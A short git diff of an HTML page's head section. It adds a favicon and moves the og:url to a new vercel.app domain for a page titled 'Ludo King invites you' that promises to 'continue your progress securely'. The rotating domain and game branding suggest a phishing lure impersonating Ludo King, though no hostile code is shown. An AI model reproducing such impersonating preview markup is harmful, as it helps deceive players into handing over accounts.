--- a/index.html
+++ b/index.html
@@ -4,12 +4,13 @@
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>Ludo King invites you</title>
-
+ <!-- ✅ Favicon for browser tab -->
+  <link rel="icon" href="https://i.postimg.cc/28qyMZLS/download.jpg" type="image/jpeg" />
   <!-- ✅ Social Media Preview Meta Tags -->
   <meta property="og:title" content="Ludo King invites you" />
   <meta property="og:description" content="Continue your Ludo King progress securely " />
   <meta property="og:image" content="https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" />
-  <meta property="og:url" content="https://game-players-online-rouge.vercel.app/" />
+  <meta property="og:url" content="https://ludo-online-invited.vercel.app" />
   <meta property="og:type" content="website" />
   <meta property="og:site_name" content="Ludo King invites you" />
 
